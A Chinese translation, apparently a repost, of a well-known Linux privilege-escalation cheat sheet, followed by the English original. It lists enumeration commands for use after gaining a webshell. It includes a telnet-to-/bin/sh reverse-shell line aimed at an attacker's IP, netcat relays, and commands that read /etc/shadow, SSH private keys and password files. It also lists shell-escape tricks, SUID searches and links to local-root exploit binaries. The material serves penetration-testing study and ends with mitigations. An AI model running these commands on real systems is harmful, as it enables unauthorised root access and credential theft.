linux提权命令

linux提权命令

在拿到一个 webshell 之后,大家首先会想到去把自己的权限提升到最高,windows 我们会提升到 SYSTEM 权限,而 Linux 我们会提升到 root 权限,拿在进行 Linux 提权的时候我们要进行哪些操作呢?需要了解哪些信息?使用什么样的命令?这些就是本文的重点。

关于Linux权限提升,有下面几个步骤:

信息收集:尽量收集更多的关于系统的信息。

数据分析:通过把收集到的数据以及信息进行分析,提取其中对我们提升权限有用的信息备用。

搜索:要知道我们需要搜索什么以及去哪里找对应的 exp 。

对症下药:修改我们搜索到的 exp ,针对不同的系统不同的情况做针对性的修改。

尝试:万事俱备,只欠东风,最后一步就是验收结果的时候了,有没有用在此一搏。

操作系统信息收集

如何查看服务器的版本?

cat /etc/issue

cat /etc/*-release

 cat /etc/lsb-release      # 基于 Debian

 cat /etc/redhat-release   # 基于 Redhat

如何查看内核的版本信息?

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz-

环境变量里的信息如何查看?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

是否有打印机?

lpstat -a


应用和服务信息

有什么服务在运行?是以什么样的权限在运行?

ps aux

ps -ef

top

cat /etc/services

关注一下以 root 权限运行的服务,有可能对我们提权有帮助。

ps aux | grep root

ps -ef | grep root

安装了哪些应用?版本是啥?当前是否在运行?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/

常见的配置文件有哪些?有没有可被攻击的插件安装?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk ‘$1 ~ /^.r./

有什么工作任务计划?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

如何查找系统内跟用户名和密码相关的文件?

grep -i user [filename]

grep -i pass [filename]

grep -C 5 “password” [filename]

find . -name “*.php” -print0 | xargs -0 grep -i -n “var $password”   # Joomla


网络通讯相关

系统内是否存在NIC?是否连接这其他网络?

/sbin/ifconfig -a

cat /etc/network/interfaces

cat /etc/sysconfig/network

网络配置信息在哪?

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L

hostname

dnsdomainname

与哪些主机在通讯?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig –list

chkconfig –list | grep 3:on

last

w

有哪些关于 IP 和 MAC 地址的缓存?

arp -e

route

/sbin/route -nee

如何抓取流量?怎么看?

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

注意:tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

如何得到一个 shell 连接?你可以与系统交互吗?

nc -lvp 4444    # 在攻击者的 PC 上执行

nc -lvp 4445    # 在受害者的 PC 上执行

telnet [atackers ip] 4444 | /bin/sh | telnet [local ip] 4445  # 在受害者的 PC 上执行

其他姿势参见:linux下反弹shell的姿势

如何进行端口转发?

参考文章:穿越边界的姿势

其他姿势请自行探索

如何使用隧道执行命令?

ssh -D 127.0.0.1:9050 -N [username]@[ip]

proxychains ifconfig


跟用户相关的信息

我是谁?谁登入了?谁登入过?等

id

who

w

last

cat /etc/passwd | cut -d: -f1    # 列出用户

grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’   # 列出超级用户

awk -F: ‘($3 == “0”) {print}’ /etc/passwd   # 列出超级用户

cat /etc/sudoers

sudo -l

有哪些敏感文件?

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

根目录如果可以访问,有哪些有趣的东西?

ls -ahlR /root/

ls -ahlR /home/

可能存在密码的文件?

cat /var/apache2/config.inc

cat /var/lib/mysql/mysql/user.MYD

cat /root/anaconda-ks.cfg

用户做了什么?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history

cat ~/.php_history

有关用户的信息在哪?

cat ~/.bashrc

cat ~/.profile

cat /var/mail/root

cat /var/spool/mail/root

私钥在什么地方?

cat ~/.ssh/authorized_keys

cat ~/.ssh/identity.pub

cat ~/.ssh/identity

cat ~/.ssh/id_rsa.pub

cat ~/.ssh/id_rsa

cat ~/.ssh/id_dsa.pub

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/ssh_host_dsa_key.pub

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/ssh_host_rsa_key.pub

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/ssh_host_key.pub

cat /etc/ssh/ssh_host_key


文件系统

/etc/ 下有哪些文件可写,哪些服务可以被重新配置?

ls -aRl /etc/ | awk ‘$1 ~ /^.w./’ 2>/dev/null     # Anyone

ls -aRl /etc/ | awk ‘$1 ~ /^..w/’ 2>/dev/null       # Owner

ls -aRl /etc/ | awk ‘$1 ~ /^…..w/’ 2>/dev/null    # Group

ls -aRl /etc/ | awk ‘/’ 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone

find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

在 /var/ 下我们能发现什么?

ls -alh /var/log

ls -alh /var/mail

ls -alh /var/spool

ls -alh /var/spool/lpd

ls -alh /var/lib/pgsql

ls -alh /var/lib/mysql

cat /var/lib/dhcp3/dhclient.leases

在网站的目录下有没有隐藏文件?

ls -alhR /var/www/

ls -alhR /srv/www/htdocs/

ls -alhR /usr/local/www/apache22/data/

ls -alhR /opt/lampp/htdocs/

ls -alhR /var/www/html/

有哪些日志文件?

cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/chttp.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

cat /var/log/faillog

cat /var/log/httpd/access_log

cat /var/log/httpd/access.log

cat /var/log/httpd/error_log

cat /var/log/httpd/error.log

cat /var/log/lastlog

cat /var/log/lighttpd/access.log

cat /var/log/lighttpd/error.log

cat /var/log/lighttpd/lighttpd.access.log

cat /var/log/lighttpd/lighttpd.error.log

cat /var/log/messages

cat /var/log/secure

cat /var/log/syslog

cat /var/log/wtmp

cat /var/log/xferlog

cat /var/log/yum.log

cat /var/run/utmp

cat /var/webmin/miniserv.log

cat /var/www/logs/access_log

cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/

ls -alh /var/log/postgresql/

ls -alh /var/log/proftpd/

ls -alh /var/log/samba/

值得注意的: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

如果命令执行被监视怎么办?

python -c ‘import pty;pty.spawn(“/bin/bash”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

文件系统如何安装?

mount

df -h

是否有未安装的文件系统?

cat /etc/fstab

有哪些 “ 高级的 Linux 文件权限 ” 在使用?

find / -perm -1000 -type d 2>/dev/null   # Sticky bit – 只有目录的所有者或文件的所有者才能删除或重命名。

find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – 作为组运行,而不是启动它的用户。

find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – 作为所有者运行,而不是启动它的用户。

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID

for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done    # 查找常见位置中用于 SGID 或 SUID 的文件

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # 从根开始查找所有的 SUID 不包括符号链接,并且只搜索三层

如何查找可写可执行的目录?

find / -writable -type d 2>/dev/null      # 可写目录

find / -perm -222 -type d 2>/dev/null     # 可写目录

find / -perm -o w -type d 2>/dev/null     # 可写目录

find / -perm -o x -type d 2>/dev/null     # 可执行目录

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null

如何查找可能存在问题的文件?

find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print   # 可写的文件

find /dir -xdev ( -nouser -o -nogroup ) -print # 没有归属的文件


寻找可利用的漏洞

安装支持哪些工具和语言?

find / -name perl*

find / -name python*

find / -name gcc*

find / -name cc

能够用于上传的软件有那些?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp*

find / -name ftp

查找 exploit 的网站?

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

有关漏洞的更多信息?

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]


应急措施

针对以上提到的所有命令,执行收集一下信息,看能否找到可以利用的点,然后针对可利用的点进行升级或者使用一些安全产品来做防护,使用如下命令进行升级:

apt-get update && apt-get upgrade

yum update

一些运行权限的问题?比如 mysql 是否是用 root 权限运行的?

原文(英文)

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Basic Linux Privilege Escalation

Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a “magic” answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more “things” to look for. It’s just a basic & rough guide. Not every command will work for each system as Linux varies so much. “It” will not jump off the screen – you’ve to hunt for that “little thing” as “the devil is in the detail“.

Enumeration is the key.

(Linux) privilege escalation is all about:

  • Collect – Enumeration, more enumeration and some more enumeration.
  • Process – Sort through data, analyse and prioritisation.
  • Search – Know what to search for and where to find the exploit code.
  • Adapt – Customize the exploit, so it fits. Not every exploit work for every system “out of the box”.
  • Try – Get ready for (lots of) trial and error.

Operating System

What’s the distribution type? What version?

1
2
3
4
cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat based

What’s the kernel version? Is it 64-bit?

1
2
3
4
5
6
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

1
2
3
4
5
6
7
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

1
lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

1
2
3
4
ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable – it’s worth a double check!

1
2
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

1
2
3
4
5
6
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

1
2
3
4
5
6
7
8
9
10
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

1
2
3
4
5
6
7
8
9
10
11
12
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

1
2
3
4
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

1
2
3
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

1
2
3
4
5
6
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

1
2
3
4
5
6
7
8
9
10
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

1
2
3
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

1
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

1
2
3
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Is port forwarding possible? Redirect and interact with traffic from another view

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

1
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

1
2
ssh -L 8080:127.0.0.1:80 [email protected]    # Local Port
ssh -R 8080:127.0.0.1:80 [email protected]    # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

1
2
3
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely

1
2
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

1
2
3
4
5
6
7
8
9
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

1
2
3
4
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything “interesting” in the home directorie(s)? If it’s possible to access

1
2
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

1
2
3
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

1
2
3
4
5
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

1
2
3
4
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?

1
2
3
4
5
6
7
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?

1
2
3
4
5
6
7
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?

1
2
3
4
5
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with “Local File Includes”!)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If commands are limited, you break out of the “jail” shell?

1
2
3
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted?

1
2
mount
df -h

Are there any unmounted file-systems?

1
cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & GUID

1
2
3
4
5
6
7
8
9
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‘common’ places: /tmp, /var/tmp, /dev/shm

1
2
3
4
5
6
7
find / -writable -type d 2>/dev/null      # world-writeable folders
find / -perm -222 -type d 2>/dev/null     # world-writeable folders
find / -perm -o w -type d 2>/dev/null     # world-writeable folders

find / -perm -o x -type d 2>/dev/null     # world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

Any “problem” files? Word-writeable, “nobody” files

1
2
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

1
2
3
4
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?

1
2
3
4
5
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) “Common” exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Is any of the above information easy to find?

Try doing it! Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched?

Kernel, operating system, all applications, their plugins and web services

1
2
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other (quick) guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html